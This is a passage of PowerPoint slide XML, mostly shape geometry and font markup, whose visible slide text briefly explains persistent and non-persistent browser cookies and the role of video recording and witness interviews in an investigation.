                  <a:pt x="22389" y="903261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48037" y="936466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81242" y="962114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120444" y="978646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="164084" y="984503"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4246372" y="984503"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4290011" y="978646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4329213" y="962114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4362418" y="936466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4388066" y="903261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4404598" y="864059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4410456" y="820419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4410456" y="164083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4404598" y="120444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4388066" y="81242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4362418" y="48037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4329213" y="22389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4290011" y="5857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4246372" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="E3B3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0252075" y="4210253"/>
            <a:ext cx="302069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solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>No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570">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>-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Persi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nt</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>cookies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56638" y="4435602"/>
            <a:ext cx="6162040" cy="2520950"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6162040" h="2520950">
                <a:moveTo>
                  <a:pt x="0" y="420115"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2826" y="371120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11095" y="323785"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24491" y="278426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42700" y="235357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65405" y="194894"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="92293" y="157352"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="123047" y="123047"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="157352" y="92293"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="194894" y="65405"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="235357" y="42700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="278426" y="24491"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="323785" y="11095"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="371120" y="2826"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="420116" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5741416" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5790411" y="2826"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5837746" y="11095"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5883105" y="24491"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5926174" y="42700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5966637" y="65405"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6004179" y="92293"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6038484" y="123047"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6069238" y="157352"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6096126" y="194894"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6118831" y="235357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6137040" y="278426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6150436" y="323785"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6158705" y="371120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6161532" y="420115"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6161532" y="2100580"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6158705" y="2149575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6150436" y="2196910"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6137040" y="2242269"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6118831" y="2285338"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6096126" y="2325801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6069238" y="2363343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6038484" y="2397648"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6004179" y="2428402"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5966637" y="2455290"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5926174" y="2477995"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5883105" y="2496204"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5837746" y="2509600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5790411" y="2517869"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5741416" y="2520696"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="420116" y="2520696"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="371120" y="2517869"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="323785" y="2509600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="278426" y="2496204"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="235357" y="2477995"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="194894" y="2455290"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="157352" y="2428402"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="123047" y="2397648"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="92293" y="2363343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65405" y="2325801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42700" y="2285338"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24491" y="2242269"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11095" y="2196910"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2826" y="2149575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2100580"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="420115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396108" y="5070500"/>
            <a:ext cx="5531485" cy="1173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-3175">
              <a:lnSpc>
                <a:spcPct val="114100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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Sto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bro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wser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cach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ti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delet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ed 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by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user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passed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defined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expiration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date.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43427" y="3913632"/>
            <a:ext cx="4410710" cy="984885"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4410709" h="984885">
                <a:moveTo>
                  <a:pt x="4246372" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="164084" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120444" y="5857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81242" y="22389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48037" y="48037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22389" y="81242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5857" y="120444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="164083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="820419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5857" y="864059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22389" y="903261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48037" y="936466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81242" y="962114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120444" y="978646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="164084" y="984503"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4246372" y="984503"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4290011" y="978646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4329213" y="962114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4362418" y="936466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4388066" y="903261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4404598" y="864059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4410456" y="820419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4410456" y="164083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4404598" y="120444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4388066" y="81242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4362418" y="48037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4329213" y="22389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4290011" y="5857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4246372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059682" y="4210253"/>
            <a:ext cx="237871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30">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Persistent</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="220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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>cookies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44445" y="3658361"/>
            <a:ext cx="5904230" cy="3784600"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5904230" h="3784600">
                <a:moveTo>
                  <a:pt x="0" y="630682"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1729" y="583607"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6837" y="537474"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15200" y="492403"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26698" y="448516"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41209" y="405935"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58609" y="364782"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78779" y="325180"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="101595" y="287249"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="126936" y="251111"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="154680" y="216890"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="184705" y="184705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="216890" y="154680"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="251111" y="126936"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="287249" y="101595"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="325180" y="78779"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364782" y="58609"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="405935" y="41209"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="448516" y="26698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="492403" y="15200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="537474" y="6837"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="583607" y="1729"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="630682" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5273294" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5320368" y="1729"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5366501" y="6837"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5411572" y="15200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5455459" y="26698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5498040" y="41209"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5539193" y="58609"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5578795" y="78779"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5616726" y="101595"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5652864" y="126936"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5687085" y="154680"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5719270" y="184705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5749295" y="216890"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5777039" y="251111"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5802380" y="287249"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5825196" y="325180"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5845366" y="364782"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5862766" y="405935"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5877277" y="448516"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5888775" y="492403"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5897138" y="537474"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5902246" y="583607"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5903976" y="630682"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5903976" y="3153410"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5902246" y="3200484"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5897138" y="3246617"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5888775" y="3291688"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5877277" y="3335575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5862766" y="3378156"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5845366" y="3419309"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5825196" y="3458911"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5802380" y="3496842"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5777039" y="3532980"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5749295" y="3567201"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5719270" y="3599386"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5687085" y="3629411"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5652864" y="3657155"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5616726" y="3682496"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5578795" y="3705312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5539193" y="3725482"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5498040" y="3742882"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5455459" y="3757393"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5411572" y="3768891"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5366501" y="3777254"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5320368" y="3782362"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5273294" y="3784092"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="630682" y="3784092"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="583607" y="3782362"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="537474" y="3777254"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="492403" y="3768891"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="448516" y="3757393"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="405935" y="3742882"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364782" y="3725482"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="325180" y="3705312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="287249" y="3682496"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="251111" y="3657155"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="216890" y="3629411"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="184705" y="3599386"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="154680" y="3567201"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="126936" y="3532980"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="101595" y="3496842"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78779" y="3458911"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58609" y="3419309"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41209" y="3378156"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26698" y="3335575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15200" y="3291688"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6837" y="3246617"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1729" y="3200484"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3153410"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="630682"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="EE63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306827" y="4852542"/>
            <a:ext cx="5182235" cy="170307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355600" marR="382905" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100499"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="8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helps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record</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10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Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>all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actions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dirty="0" sz="2200" spc="-6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Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>investigation.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263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Log</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-11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dirty="0" sz="22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video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rebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>should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recorded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endParaRPr sz="220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  <a:spcBef>
                <a:spcPts val="15"/>
              </a:spcBef>
            </a:pP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strengthen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investigation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process.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502655" y="306451"/>
            <a:ext cx="525081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80">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Video</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-114">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="175">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-145">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="135">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Witness</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-145">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="105">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Interviews</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2875788" y="3156204"/>
            <a:ext cx="4238625" cy="875030"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4238625" h="875029">
                <a:moveTo>
                  <a:pt x="4092447" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="145795" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="99714" y="7433"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59692" y="28131"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28131" y="59692"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7433" y="99714"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="145796"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="728980"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7433" y="775061"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28131" y="815083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59692" y="846644"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="99714" y="867342"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="145795" y="874776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4092447" y="874776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4138529" y="867342"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4178551" y="846644"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4210112" y="815083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4230810" y="775061"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4238244" y="728980"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4238244" y="145796"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4230810" y="99714"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4210112" y="59692"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4178551" y="28131"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4138529" y="7433"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4092447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615688" y="3401060"/>
            <a:ext cx="75755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40">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Video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1020" y="760476"/>
            <a:ext cx="7560564" cy="36575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8686038" y="3658361"/>
            <a:ext cx="5904230" cy="3784600"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5904230" h="3784600">
                <a:moveTo>
                  <a:pt x="0" y="630682"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1729" y="583607"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6837" y="537474"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15200" y="492403"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26698" y="448516"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41209" y="405935"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58609" y="364782"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78779" y="325180"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="101595" y="287249"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="126936" y="251111"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="154680" y="216890"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="184705" y="184705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="216890" y="154680"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="251111" y="126936"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="287249" y="101595"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="325180" y="78779"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364782" y="58609"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="405935" y="41209"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="448516" y="26698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="492403" y="15200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="537474" y="6837"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="583607" y="1729"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="630681" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5273294" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5320368" y="1729"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5366501" y="6837"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5411572" y="15200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5455459" y="26698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5498040" y="41209"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5539193" y="58609"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5578795" y="78779"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5616726" y="101595"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5652864" y="126936"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5687085" y="154680"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5719270" y="184705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5749295" y="216890"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5777039" y="251111"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5802380" y="287249"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5825196" y="325180"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5845366" y="364782"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5862766" y="405935"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5877277" y="448516"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5888775" y="492403"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5897138" y="537474"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5902246" y="583607"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5903975" y="630682"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5903975" y="3153410"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5902246" y="3200484"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5897138" y="3246617"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5888775" y="3291688"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5877277" y="3335575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5862766" y="3378156"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5845366" y="3419309"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5825196" y="3458911"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5802380" y="3496842"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5777039" y="3532980"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5749295" y="3567201"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5719270" y="3599386"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5687085" y="3629411"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5652864" y="3657155"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5616726" y="3682496"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5578795" y="3705312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5539193" y="3725482"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5498040" y="3742882"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5455459" y="3757393"/>
                </a:lnTo>
                <a:lnTo>
